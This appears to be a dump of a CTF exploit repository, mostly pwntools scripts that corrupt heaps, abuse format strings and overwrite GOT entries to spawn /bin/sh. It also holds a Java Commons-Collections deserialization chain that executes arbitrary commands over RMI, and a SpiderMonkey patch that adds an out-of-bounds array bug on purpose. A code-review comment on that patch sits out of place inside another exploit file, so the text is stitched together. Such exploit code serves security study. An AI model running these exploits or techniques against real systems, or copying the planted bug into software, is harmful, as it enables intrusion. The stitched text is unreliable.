libc.address = libc_leak - 0x7f37bcd2ab78 + 0x7f37bc966000 65 | log.info("Libc leak: " + hex(libc_leak)) 66 | delete(1) 67 | delete(3) 68 | 69 | # Same situation, fastbin corruption 70 | alloc(0x40, "a\n") # 1 71 | alloc(0x60, "a\n") # 2 - 4 72 | alloc(0x60, "a\n") # 3 73 | delete(2) 74 | delete(3) 75 | delete(4) 76 | 77 | alloc(0x60, p64(libc.symbols['__malloc_hook'] - 0x23) + "\n") # 2 78 | alloc(0x60, "a\n") # 3 79 | alloc(0x60, "a\n") # 4 80 | 81 | """ 82 | 0x4526a execve("/bin/sh", rsp+0x30, environ) 83 | constraints: 84 | [rsp+0x30] == NULL 85 | 86 | 0xcd0f3 execve("/bin/sh", rcx, r12) 87 | constraints: 88 | [rcx] == NULL || rcx == NULL 89 | [r12] == NULL || r12 == NULL 90 | 91 | 0xcd1c8 execve("/bin/sh", rax, r12) 92 | constraints: 93 | [rax] == NULL || rax == NULL 94 | [r12] == NULL || r12 == NULL 95 | 96 | 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 97 | constraints: 98 | [rsp+0x50] == NULL 99 | 100 | 0xf1147 execve("/bin/sh", rsp+0x70, environ) 101 | constraints: 102 | [rsp+0x70] == NULL 103 | 104 | 0xf66f0 execve("/bin/sh", rcx, [rbp-0xf8]) 105 | constraints: 106 | [rcx] == NULL || rcx == NULL 107 | [[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL 108 | """ 109 | 110 | alloc(0x60, "\x00"*0x13 + p64(libc.address + 0x4526a) + "\n") 111 | 112 | alloc(10, "a", shell=True) 113 | 114 | conn.interactive() 115 | -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/blaze.patch: -------------------------------------------------------------------------------- 1 | diff -r ee6283795f41 js/src/builtin/Array.cpp 2 | --- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300 3 | +++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000 4 | 
@@ -192,6 +192,20 @@ 5 | return ToLength(cx, value, lengthp); 6 | } 7 | 8 | +static MOZ_ALWAYS_INLINE bool 9 | +BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length) 10 | +{ 11 | + if (obj->is()) { 12 | + obj->as().setLengthInt32(length); 13 | + obj->as().setCapacityInt32(length); 14 | + obj->as().setInitializedLengthInt32(length); 15 | + return true; 16 | + } 17 | + return false; 18 | +} 19 | + 20 | + 21 | + 22 | /* 23 | * Determine if the id represents an array index. 24 | * 25 | @@ -1578,6 +1592,23 @@ 26 | return DenseElementResult::Success; 27 | } 28 | 29 | +bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp) 30 | +{ 31 | + CallArgs args = CallArgsFromVp(argc, vp); 32 | + RootedObject obj(cx, ToObject(cx, args.thisv())); 33 | + if (!obj) 34 | + return false; 35 | + 36 | + if (!BlazeSetLengthProperty(cx, obj, 420)) 37 | + return false; 38 | + 39 | + //uint64_t l = obj.as().setLength(cx, 420); 40 | + 41 | + args.rval().setObject(*obj); 42 | + return true; 43 | +} 44 | + 45 | + 46 | // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce 47 | // 22.1.3.21 Array.prototype.reverse ( ) 48 | bool 49 | @@ -3511,6 +3542,8 @@ 50 | JS_FN("unshift", array_unshift, 1,0), 51 | JS_FNINFO("splice", array_splice, &array_splice_info, 2,0), 52 | 53 | + JS_FN("blaze", array_blaze, 0,0), 54 | + 55 | /* Pythonic sequence methods. */ 56 | JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0), 57 | JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice), 58 | diff -r ee6283795f41 js/src/builtin/Array.h 59 | --- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300 60 | +++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000 61 | 
@@ -166,6 +166,9 @@ 62 | array_reverse(JSContext* cx, unsigned argc, js::Value* vp); 63 | 64 | extern bool 65 | +array_blaze(JSContext* cx, unsigned argc, js::Value* vp); 66 | + 67 | +extern bool 68 | array_splice(JSContext* cx, unsigned argc, js::Value* vp); 69 | 70 | extern const JSJitInfo array_splice_info; 71 | diff -r ee6283795f41 js/src/vm/ArrayObject.h 72 | --- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300 73 | +++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000 74 | 
@@ -60,6 +60,14 @@ 75 | getElementsHeader()->length = length; 76 | } 77 | 78 | + void setCapacityInt32(uint32_t length) { 79 | + getElementsHeader()->capacity = length; 80 | + } 81 | + 82 | + void setInitializedLengthInt32(uint32_t length) { 83 | + getElementsHeader()->initializedLength = length; 84 | + } 85 | + 86 | // Make an array object with the specified initial state. 87 | static inline ArrayObject* 88 | createArray(JSContext* cx, -------------------------------------------------------------------------------- /hacklu-2015/bookstore/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./bookstore" 7 | bin = ELF(file) 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(choice, ch=None): 14 | conn.recvuntil("Submit\n") 15 | if ch is None: 16 | conn.sendline(str(choice)) 17 | else: 18 | conn.sendline(ch) 19 | 20 | def edit(num, content): 21 | menu(num) 22 | conn.recvuntil("order:") 23 | conn.sendline(content) 24 | 25 | def delete(num): 26 | menu(num+2) 27 | 28 | def submit(ch=None): 29 | menu(5, ch=ch) 30 | 31 | FINI_ARRAY_ADDR = 0x6011B8 32 | MAIN_OFFSET = 0xA39 33 | 34 | c1 = "%" + str(0x39 - (0x45 - 0x39)) + "c%13$hhn" + \ 35 | "%" + str(0xa - 0x39 + 0x100) + "c%14$hhn-dddd%31$p-%33$p-" 36 | c1 = c1.ljust(0x80, "c") 37 | c2 = ("b"*0x20).ljust(0x140, "\x00") 38 | 39 | payload = c1 + p64(0x0) + p64(0x151) + \ 40 | c2 + \ 41 | p64(0x0) + p64(0x21) + "c"*0x10 + p64(0) + p64(0x31) 42 | edit(1, payload) 43 | delete(2) 44 | 45 | stack_payload = "5"*8 + p64(FINI_ARRAY_ADDR) + p64(FINI_ARRAY_ADDR+1) 46 | submit(ch=stack_payload) 47 | 48 | conn.recvuntil("dddd0x") 49 | 50 | libc_leak = int(conn.recvuntil("-")[:-1], 16) 51 | libc.address = libc_leak - 0x7f0ae6145830 + 0x7f0ae6125000 52 | 53 | stack_leak = int(conn.recvuntil("-")[2:-1], 16) 
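Review bot: `setCapacityInt32` and `setInitializedLengthInt32` store straight into the ObjectElements header with no relation to the size of the allocation that header describes, so any caller can declare a capacity or initialized length larger than the real buffer; the existing initialized-length setter on NativeObject guards this with an assertion against the dense capacity as far as I recall, and these two bypass it. If they must exist, add the same guard, e.g. `MOZ_ASSERT(length <= getDenseCapacity());` at the top of `setInitializedLengthInt32`, and drop `setCapacityInt32` entirely, since capacity should only change where the elements buffer is reallocated. If this is a deliberately weakened build, a comment on both setters saying they are raw header writes for that purpose would stop them being copied into real code. The enclosing class starts and ends outside the hunk.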
54 | log.info("Stack leak: " + hex(stack_leak)) 55 | 56 | log.info("Libc address: " + hex(libc.address)) 57 | 58 | # Do everything once again 59 | 60 | ROP_CHAIN_ADDR = stack_leak - 0x7ffd7f152bc8 + 0x7ffd7f1529d8 61 | ONE_GADGET_ADDR = libc.address + 0x4526a 62 | STACK_CLEAR_ADDR = stack_leak - 0x7ffd24208538 + 0x7ffd24208380 63 | 64 | words = [None]*4 65 | words[0] = ONE_GADGET_ADDR % 0x10000 66 | words[1] = (ONE_GADGET_ADDR / 0x10000) % 0x10000 67 | words[2] = (ONE_GADGET_ADDR / 0x100000000) % 0x10000 68 | words[3] = (ONE_GADGET_ADDR / 0x10000000000) % 0x10000 69 | 70 | def fix(param): 71 | log.info(param) 72 | if param < 0: 73 | return str(param + 0x10000) 74 | return str(param) 75 | 76 | c1 = "%" + fix(words[0] - (0x45 - 0x39)) + "c%13$hn" + \ 77 | "%" + fix(words[1] - words[0]) + "c%14$hn" + \ 78 | "%" + fix(words[2] - words[1]) + "c%15$hn" + \ 79 | "%" + fix(0 - words[2]) + "c%16$hn%17$hn%18$hn" 80 | 81 | c1 = c1.ljust(0x80, "c") 82 | c2 = ("b"*0x110 + p64(0) + p64(0x12401)).ljust(0x140, "\x00") 83 | 84 | payload = c1 + p64(0x0) + p64(0x151) + \ 85 | c2 + \ 86 | p64(0x0) + p64(0x21) + "c"*0x10 + p64(0) + p64(0x31) 87 | edit(1, payload) 88 | delete(2) 89 | 90 | stack_payload = "5"*8 + p64(ROP_CHAIN_ADDR) + p64(ROP_CHAIN_ADDR + 2) + \ 91 | p64(ROP_CHAIN_ADDR + 4) + \ 92 | p64(STACK_CLEAR_ADDR) + p64(STACK_CLEAR_ADDR + 2) + \ 93 | p64(STACK_CLEAR_ADDR + 4) 94 | 95 | submit(ch=stack_payload) 96 | 97 | log.info("one_gadget: " + hex(ONE_GADGET_ADDR)) 98 | 99 | conn.interactive() 100 | -------------------------------------------------------------------------------- /whitehat-grandpix-2018/book-store/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | from pwn import * 4 | 5 | #context.log_level = 'debug' 6 | context.terminal = ['tmux', 'splitw', '-h'] 7 | 8 | file = "./BookStore" 9 | bin = ELF(file) 10 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 11 | #libc = ELF("./libc.so.6") 12 | 13 | env 
= {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 14 | 15 | conn = process(file) 16 | #gdb.attach(conn) 17 | 18 | def menu(ch): 19 | conn.recvuntil("Your choice") 20 | conn.sendline(str(ch)) 21 | 22 | """ 23 | 00000000 book struc ; (sizeof=0x3A, mappedto_6) 24 | 00000000 next dq ? ; offset 25 | 00000008 brief_ptr dq ? ; offset 26 | 00000010 title db 32 dup(?) 27 | 00000030 ref_idx db ? 28 | 00000031 references_to db ? 29 | 00000032 format_func dq ? 30 | 0000003A book ends 31 | """ 32 | 33 | def add(title, b_len, brief, ref_title, best_selling=False): 34 | menu(1) 35 | conn.recvuntil("Title") 36 | conn.send(title) 37 | conn.recvuntil("brief size") 38 | conn.sendline(str(b_len)) 39 | conn.recvuntil("brief") 40 | conn.send(brief) 41 | conn.recvuntil("book title") 42 | conn.send(ref_title) 43 | conn.recvuntil("Best Selling?") 44 | if best_selling: 45 | conn.sendline("y") 46 | else: 47 | conn.sendline("n") 48 | 49 | def edit(old_title, new_title, b_len, brief, best_selling=False): 50 | menu(2) 51 | conn.recvuntil("Old title") 52 | conn.send(old_title) 53 | conn.recvuntil("title") 54 | conn.send(new_title) 55 | conn.recvuntil("brief size") 56 | conn.sendline(str(b_len)) 57 | conn.recvuntil("brief") 58 | conn.send(brief) 59 | conn.recvuntil("Best Selling?") 60 | if best_selling: 61 | conn.sendline("y") 62 | else: 63 | conn.sendline("n") 64 | 65 | def remove(title): 66 | menu(3) 67 | conn.recvuntil("Title") 68 | conn.send(title) 69 | 70 | def list(): 71 | menu(4) 72 | 73 | # Leaking libc 74 | add("title0\n", 0x50, "brief0\n", "\n") 75 | add("title1\n", 0x50, "brief1\n", "\n", best_selling=True) 76 | for i in range(0xff): 77 | add("title-"+str(i)+"\n", 0x50, "brief.\n", "title1\n", best_selling=False) 78 | 79 | add("title3\n", 0x50, "brief3\n", "\n", best_selling=True) 80 | remove("title0\n") 81 | 82 | payload = p64(0) + p64(bin.got['puts']) + "a"*0x20 + "bb" + \ 83 | p64(bin.symbols['strdup']) 84 | payload = payload.ljust(0x47, "a") 85 | add("title0\n", 0x47, 
payload, "\n") 86 | list() 87 | conn.recvuntil("a"*0x20) 88 | conn.recvuntil("|") 89 | 90 | puts_addr = u64(conn.recvn(6) + "\x00\x00") 91 | libc.address = puts_addr - libc.symbols['puts'] 92 | 93 | payload = p64(0) + p64(next(libc.search("/bin/sh"))) + "a"*0x20 + "bb" + \ 94 | p64(libc.symbols['system']) 95 | payload = payload.ljust(0x47, "a") 96 | edit("title0\n", "title0\n", 0x47, payload, "\n") 97 | 98 | list() 99 | 100 | log.info("Puts addr: " + hex(puts_addr)) 101 | 102 | conn.interactive() 103 | -------------------------------------------------------------------------------- /hacklu-2017/HeapsOfPrint/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./HeapsOfPrint" 7 | libc = ELF("libc.so.6") 8 | 9 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 10 | 11 | #conn = remote("flatearth.fluxfingers.net", 1747) 12 | conn = process(file, env=env) 13 | #gdb.attach(conn, """ 14 | #break *do_that + 51 15 | #""") 16 | 17 | def write_first(suffix): 18 | conn.recvuntil("character is ") 19 | stack_off = ord(conn.recvn(1)) - 0x17 20 | off_2 = 0xb3 - stack_off - 8 - 2 21 | if off_2 < 0: 22 | off_2 += 0x100 23 | fmt = "%1c"*4 \ 24 | + "%" + str(stack_off + 8 - 4) + "c%hhn" \ 25 | + "%1c"*2 \ 26 | + "%" + str(off_2) + "c%hhn" \ 27 | + suffix 28 | conn.sendline(fmt) 29 | 30 | def write(data, offset, rbp_off, g): 31 | conn.recvuntil("character is ") 32 | off_2 = 0xb3 - rbp_off - 2 + 0x10000 33 | fmt = "%1c"*4 \ 34 | + "%" + str(rbp_off - 4) + "c%hn" \ 35 | + "%1c"*2 \ 36 | + "%" + str(off_2) + "c%hhn" 37 | off_3 = offset - 0xb3 - 5 - 3*g 38 | fmt += "%1c"*(5 + 3*g) \ 39 | + "%" + str(off_3) + "c%hn" 40 | off_4 = data - offset - 29 41 | if off_4 < 0: 42 | off_4 += 0x10000 43 | fmt += "%1c"*(29) \ 44 | + "%" + str(off_4) + "c%hn" 45 | conn.sendline(fmt) 46 | 47 | def write_payload(payload, offset, 
rbp_off): 48 | i = 0 49 | while len(payload) != 0: 50 | data = payload[0:2] 51 | write(int(data[::-1].encode('hex'), 16), (offset + i*2), rbp_off - 3*8 - 3*8*(i+1), i) 52 | i += 1 53 | payload = payload[2:] 54 | 55 | write_first( 56 | suffix = "aaaa%12$p" \ 57 | + "bbbb%6$p" \ 58 | + "cccc%17$p" \ 59 | + "dddd") 60 | 61 | conn.recvuntil("aaaa") 62 | 63 | prog_base = u64(("\x00\x00" + conn.recvuntil("bbbb")[2:-4].decode('hex'))[::-1]) - 0x990 64 | 65 | rbp = u64(("\x00\x00" + conn.recvuntil("cccc")[2:-4].decode('hex'))[::-1]) 66 | rbp_off = rbp % 0x10000 67 | 68 | system_addr = u64(("\x00\x00" + conn.recvuntil("dddd")[2:-4].decode('hex'))[::-1]) \ 69 | + 0x78390 - 0x53830 70 | bin_sh_addr = system_addr + next(libc.search("/bin/sh")) - libc.symbols['system'] 71 | 72 | offset = (rbp & 0xffff) + 0x150 73 | 74 | pop_rdi_addr = prog_base + 0x009f3 75 | 76 | payload = p64(pop_rdi_addr) \ 77 | + p64(bin_sh_addr) \ 78 | + p64(system_addr) 79 | 80 | write_payload(payload, offset, rbp_off) 81 | 82 | # Now updating ebp to point to our offset 83 | 84 | conn.recvuntil("character is") 85 | 86 | off = rbp_off + 0x3208 - 0x3360 87 | 88 | # Return to main 89 | main_addr = prog_base + 0x906 90 | 91 | off2 = main_addr % 0x10000 - off - 8 - 2 92 | if off2 < 0: 93 | off2 += 0x10000 94 | 95 | fmt = "%1c"*4 \ 96 | + "%" + str(off + 8 - 4) + "c%hn" \ 97 | + "%1c"*2 \ 98 | + "%" + str(off2) + "c%hn" 99 | 100 | conn.sendline(fmt) 101 | 102 | # Now modify rbp 103 | fmt = "%" + str(offset - 8) + "c%6$hn" 104 | 105 | conn.sendline(fmt) 106 | 107 | conn.interactive() 108 | -------------------------------------------------------------------------------- /insomni-hack-17/wheelofrobots/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./wheelofrobots" 7 | 8 | bin = ELF(file) 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | 
conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def menu(choice): 15 | conn.recvuntil("Start the Wheel") 16 | conn.recvuntil("choice :") 17 | conn.send(str(choice)) 18 | 19 | def a(robo_type, param=None): 20 | menu(1) 21 | conn.recvuntil("choice :") 22 | if type(robo_type) == type(1): 23 | conn.send(str(robo_type)) 24 | else: 25 | conn.send(robo_type) 26 | if param is not None: 27 | conn.recvuntil("Increase") 28 | conn.send(str(param)) 29 | 30 | def d(robo_type): 31 | menu(2) 32 | conn.recvuntil("choice :") 33 | conn.send(str(robo_type)) 34 | 35 | def c(robo_type, name): 36 | menu(3) 37 | conn.recvuntil("choice :") 38 | conn.send(str(robo_type)) 39 | conn.recvuntil("name: ") 40 | conn.send(name) 41 | 42 | def s(): 43 | menu(4) 44 | 45 | # Unlink exploit - pointers in global memory 46 | 47 | a(2, 2) # malloc(0x28) 48 | a(3, 8) # malloc(160) 49 | d(2) # Goes into fastbin 50 | 51 | # malloc_consolidate -> fast chunk goes into smallbin, prev_in_use cleared 52 | # Also set flag for robo2 as set 53 | a("4aaaa1") 54 | 55 | d(4) 56 | 57 | # Now we can create a fake chunk inside robot 2 58 | 59 | robo2_addr = 0x06030F0 60 | 61 | payload = p64(0) + \ 62 | p64(0x20) + \ 63 | p64(robo2_addr - 8*3) + \ 64 | p64(robo2_addr - 8*2) + \ 65 | p64(0x20) 66 | c(2, payload) 67 | 68 | # Freeing 3rd robo -> unlink 69 | d(3) 70 | 71 | # robo2 now points to robo2_addr - 3*8 ! 
72 | 73 | # robo4 will be used for arbitrary read and write 74 | a(4) 75 | 76 | def a_write(addr, value): 77 | # First allocate robo4 78 | payload = p64(0) + \ 79 | p64(addr) 80 | c(2, payload) 81 | c(4, value) 82 | 83 | # Preparing for a_read 84 | # Overwrite exit's got with 'ret' gadget 85 | # Setting robo count > 2 86 | ret_gadget = 0x40162D 87 | robo_count_addr = 0x603130 88 | a_write(bin.got['exit'], p64(ret_gadget)) 89 | a_write(robo_count_addr, p64(3)) 90 | 91 | def a_read(addr): 92 | # Trying to read robo 4 93 | payload = p64(0) + \ 94 | p64(addr) 95 | c(2, payload) 96 | data = "" 97 | while data == "": 98 | s() 99 | l = conn.recvline() 100 | if "( )" in l: 101 | continue # robo 2 was read 102 | if "/\\ ____________________________ /\\" in l: 103 | continue # after 4 was read 104 | conn.recvuntil("Thx ") 105 | data = conn.recvuntil("!")[:-1] 106 | if "(null)" in data: 107 | data = "" # robo 1 was read 108 | return data 109 | 110 | puts_addr = u64(a_read(bin.got['puts']) + "\x00\x00") 111 | 112 | system_addr = libc.symbols['system'] - libc.symbols['puts'] + puts_addr 113 | 114 | a_write(bin.got['free'], p64(system_addr)) 115 | 116 | c(2, "/bin/sh\x00") 117 | d(2) 118 | 119 | conn.interactive() 120 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/MyExploit.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.net.InetAddress; 4 | import java.rmi.registry.LocateRegistry; 5 | import java.rmi.registry.Registry; 6 | import java.util.Arrays; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | import java.util.Objects; 10 | import java.util.Scanner; 11 | 12 | import org.apache.commons.collections.Transformer; 13 | import org.apache.commons.collections.bag.HashBag; 14 | import org.apache.commons.collections.functors.ChainedTransformer; 15 | import org.apache.commons.collections.functors.ConstantTransformer; 
16 | import org.apache.commons.collections.functors.InvokerTransformer; 17 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 18 | import org.apache.commons.collections.map.LazyMap; 19 | import org.mockito.internal.util.reflection.Whitebox; 20 | 21 | import ch.scrt.model.Hat; 22 | 23 | public class MyExploit { 24 | public static void main(String[] args) throws Exception { 25 | System.setProperty( 26 | "org.apache.commons.collections.enableUnsafeSerialization", 27 | "true"); 28 | Registry registry = LocateRegistry.getRegistry( 29 | InetAddress.getByName("localhost").getHostName(), 30 | 2020); 31 | WizardAPI wizard = (WizardAPI)registry.lookup("Wizard"); 32 | Scanner in = new Scanner(System.in); 33 | while(true) { 34 | System.out.print("$ "); 35 | String command = in.nextLine(); 36 | try { 37 | System.out.println(wizard.castASpell(generatePayload(command))); 38 | } catch (Exception e) { 39 | System.out.println("Exception: " + e); 40 | } 41 | } 42 | } 43 | @SuppressWarnings("rawtypes") 44 | public static Hat generatePayload(String command) throws Exception { 45 | /* Transformer for Runtime.getRuntime().exec(command) */ 46 | String[] execArgs = new String[]{command}; 47 | Transformer[] transformers = new Transformer[] { 48 | new ConstantTransformer(Runtime.class), 49 | new InvokerTransformer("getMethod", 50 | new Class[] { String.class, Class[].class }, 51 | new Object[] {"getRuntime", new Class[0] }), 52 | new InvokerTransformer("invoke", 53 | new Class[] { Object.class, Object[].class }, 54 | new Object[] { null, new Object[0] }), 55 | new InvokerTransformer("exec", 56 | new Class[] { String.class }, 57 | new String[] { command }), 58 | new ConstantTransformer(1) 59 | }; 60 | /* Chaining all these */ 61 | Transformer chainedTransformer = new ChainedTransformer(transformers); 62 | Map map = new HashMap(); 63 | Map lazyMap = LazyMap.decorate(map, chainedTransformer); 64 | 65 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 66 | HashBag 
bagWithExploit = new HashBag(); 67 | bagWithExploit.add(new Object()); 68 | 69 | Map internalMap = (Map) Whitebox.getInternalState(bagWithExploit, "map"); 70 | Object[] nodesArray = (Object[]) Whitebox.getInternalState(internalMap, "table"); 71 | Object node = Arrays.stream(nodesArray) 72 | .filter(Objects::nonNull) 73 | .findFirst() 74 | .orElseThrow(() -> new RuntimeException("this can't happen")); 75 | Whitebox.setInternalState(node, "key", entry); 76 | 77 | Hat hat = new Hat(); 78 | Whitebox.setInternalState(hat, "content", bagWithExploit); 79 | return hat; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /acebear-2018/easy_heap/exploit.py: -------------------------------------------------------------------------------- 1 | """ 2 | A trivial solution to this exists by using the global 'name' string to do 3 | arbitrary read/write 4 | 5 | However, I tried exploiting the challenge without using the global ptr 6 | 7 | 1. UAF in fastbin leads to fastbin corruption. 8 | 2. Modify fd pointer to point somewhere before an allocated chunk's header 9 | 3. Allocate overlapping chunks -> change a chunk's size > fastbin range 10 | 4. 
Unsafe unlink (global ptrs present in .bss) 11 | """ 12 | 13 | from pwn import * 14 | 15 | #context.log_level = 'debug' 16 | context.terminal = ['tmux', 'splitw', '-h'] 17 | 18 | file = "./easy_heap" 19 | 20 | bin = ELF(file) 21 | libc = ELF("easyheap_libc.so.6") 22 | 23 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./easyheap_libc.so.6")} 24 | 25 | conn = process(file, env=env) 26 | #gdb.attach(conn) 27 | 28 | def menu(choice): 29 | conn.recvuntil("Your choice: ") 30 | conn.sendline(str(choice)) 31 | 32 | def create(index, name): 33 | menu(1) 34 | conn.recvuntil("Index: ") 35 | conn.sendline(str(index)) 36 | conn.recvuntil("Input this name: ") 37 | conn.send(name) 38 | conn.recvuntil("Done!") 39 | 40 | def edit(index, name): 41 | menu(2) 42 | conn.recvuntil("Index: ") 43 | conn.sendline(str(index)) 44 | conn.recvuntil("Input new name: ") 45 | conn.send(name) 46 | conn.recvuntil("Done!") 47 | 48 | def delete(index): 49 | menu(3) 50 | conn.recvuntil("Index: ") 51 | conn.sendline(str(index)) 52 | conn.recvuntil("Done!") 53 | 54 | def show(index): 55 | menu(4) 56 | conn.recvuntil("Index: ") 57 | conn.sendline(str(index)) 58 | conn.recvuntil("This name") 59 | conn.recvuntil("is: ") 60 | 61 | conn.sendline("vampire") 62 | conn.recvuntil("age") 63 | conn.sendline(str(21)) 64 | 65 | names_addr = 0x0804B0A0 66 | 67 | # Leaking heap address 68 | create(0, "abc") 69 | create(1, "def") 70 | create(2, "ghi") 71 | delete(1) 72 | delete(2) 73 | show(2) 74 | 75 | heap_leak = u32(conn.recvn(4)) 76 | 77 | # Clearing fastbin 78 | create(2, "a") 79 | payload = p32(0) + \ 80 | p32(0xe8) + \ 81 | p32(names_addr + 4 - 3*4) + \ 82 | p32(names_addr + 4 - 2*4) 83 | create(1, payload) 84 | 85 | # Creating size for non fast chunk 86 | 87 | for i in range(3): 88 | create(9, "a") 89 | 90 | create(8, "a") 91 | create(9, "a") 92 | 93 | for i in range(15): 94 | create(6, (p32(0xe8) + p32(0x51))*4) 95 | 96 | # Fastbin corruption 97 | delete(8) 98 | log.info("Heap leak: " + hex(heap_leak)) 99 | 
edit(8, p32(heap_leak + 0x100 - 0x28 - 0x8) + p32(0x29)) 100 | create(8, "a") 101 | payload = p32(0)*6 + \ 102 | p32(0xe8) + \ 103 | p32(0xe8) 104 | create(7, payload) 105 | 106 | delete(9) 107 | 108 | def a_read(addr): 109 | edit(1, p32(0)*2 + p32(addr)) 110 | show(0) 111 | 112 | def a_write(addr, data): 113 | edit(1, p32(0)*2 + p32(addr)) 114 | edit(0, data) 115 | 116 | a_read(bin.got['atoi']) 117 | atoi_addr = u32(conn.recvn(4)) 118 | libc.address = atoi_addr - libc.symbols['atoi'] 119 | 120 | a_write(bin.got['atoi'], p32(libc.symbols['system'])) 121 | 122 | conn.sendline("/bin/sh") 123 | 124 | log.info("Libc leak: " + hex(atoi_addr)) 125 | log.info("Heap leak: " + hex(heap_leak)) 126 | conn.interactive() 127 | -------------------------------------------------------------------------------- /codegate-2018/zoo/dec.c: -------------------------------------------------------------------------------- 1 | void feed_animal(zoo *z) { 2 | int animal_idx = get_index_by_name(z); 3 | return if animal_idx < 0 || > 4; 4 | a = z->animals[animal_idx]; 5 | int dung_diff = 0; 6 | int feed_idx = a->feed_index; 7 | if (a->feeds[feed_idx]) { 8 | puts("cannot feed more"); 9 | } else { 10 | feed = a->feeds[feed_idx] = malloc(0x80); 11 | memset(feed, 0, 0x80); 12 | if (a->feed_flag_ill) { 13 | feed->str = offset_of_"Medicine"; 14 | feed->w2 = animals[animal_idx + 1]->dung_index2; 15 | read(feed->medicine, 8); 16 | read(feed->med_desc, 120); // Overflow 17 | } else { 18 | feed->str = offset_of_"Food"; 19 | puts("Your animal ate a food"); 20 | } 21 | a->feed_index = (a->feed_index + 1) % 20; 22 | int diff = (a->feed_index - a->feed_index2 + 20) % 20; 23 | if (diff == 0 && a->feed[0]) { 24 | diff = 20; 25 | } 26 | if (!a->feed_flag_ill && diff > 4 && is_odd(diff)) { 27 | int dung_index = a->dung_index; 28 | if (a->dungs[dung_index]) { 29 | puts("Clean dung"); 30 | return; 31 | } 32 | dung = a->dungs[dung_index] = malloc(0x80); 33 | memset(dung, 0, 0x80); 34 | a->dung_index = 
(a->dung_index + 1) % 25; 35 | dung_diff = (a->dung_index - a->dung_index2 + 25 % 25); 36 | if (dung_diff==0 && a->dungs[0]) { 37 | dung_diff = 20; 38 | } 39 | } 40 | if (dung_duff > 4) { 41 | a->is_ill = 1; 42 | puts("Your animal is ill"); 43 | } 44 | } 45 | } 46 | 47 | void clean_animal(zoo *z) { 48 | animal_idx = get_index_by_name(); 49 | // check animal_idx 50 | int dung_index2 = a->dung_index2; 51 | if (a->dungs[dung_index2]) { 52 | free(a->dungs[dung_index2]); 53 | a->dungs[dung_index2] = 0; 54 | a->dungs_index2 = (a->dungs_index2 + 1) % 25; 55 | if (dung_diff==0) { 56 | dung_diff = 20; 57 | } 58 | printf("Good job"); 59 | } else { 60 | puts("You don't have to clean dung"); 61 | } 62 | } 63 | 64 | void walk(zoo *z) { 65 | get_index_by_name(); 66 | // check animal index 67 | int feed_index2 = a->feed_index2; 68 | if (a->feeds[feed_index2]) { 69 | free(a->feeds[feed_index2]); 70 | a->feeds[feed_index2] = 0; 71 | // increment feed_index2 72 | if (feed_diff==0) { 73 | feed_diff = 20; 74 | } 75 | if (++a->likes > 14) { 76 | for(int i = 0;i<=19;i++) { 77 | if (a->feeds[i] && 78 | a->feeds[i]->str != "Medicine" || "Food") { // offset 79 | puts("Animal is happy\n"); 80 | read(0, a->feeds[i]->medicine_desc, 120); // overflow 81 | } 82 | } 83 | } 84 | } else { 85 | puts("doesn't need walk"); 86 | } 87 | } 88 | 89 | void take_hospital(zoo *z) { 90 | // get and check index 91 | if (a->is_ill) { 92 | for(int i = 0;i<4;i++) { 93 | int dung_index2 = a->dung_index2; 94 | if (!a->dungs[dung_index2]) { 95 | break; 96 | } 97 | free(a->dungs[dung_index2]); 98 | a->dungs[dung_index2] = 0; 99 | // increment dung_index2 100 | } 101 | int dung_diff; 102 | if (dung_diff==0 && a->dungs[0]) { 103 | dung_diff = 20; 104 | } 105 | if (dung_diff > 4) { 106 | a->feed_flag_ill = 1; 107 | printf("take medicine\n"); 108 | } else { 109 | a->is_ill = 0; 110 | } 111 | } else { 112 | puts("Not ill"); 113 | } 114 | } 115 | 
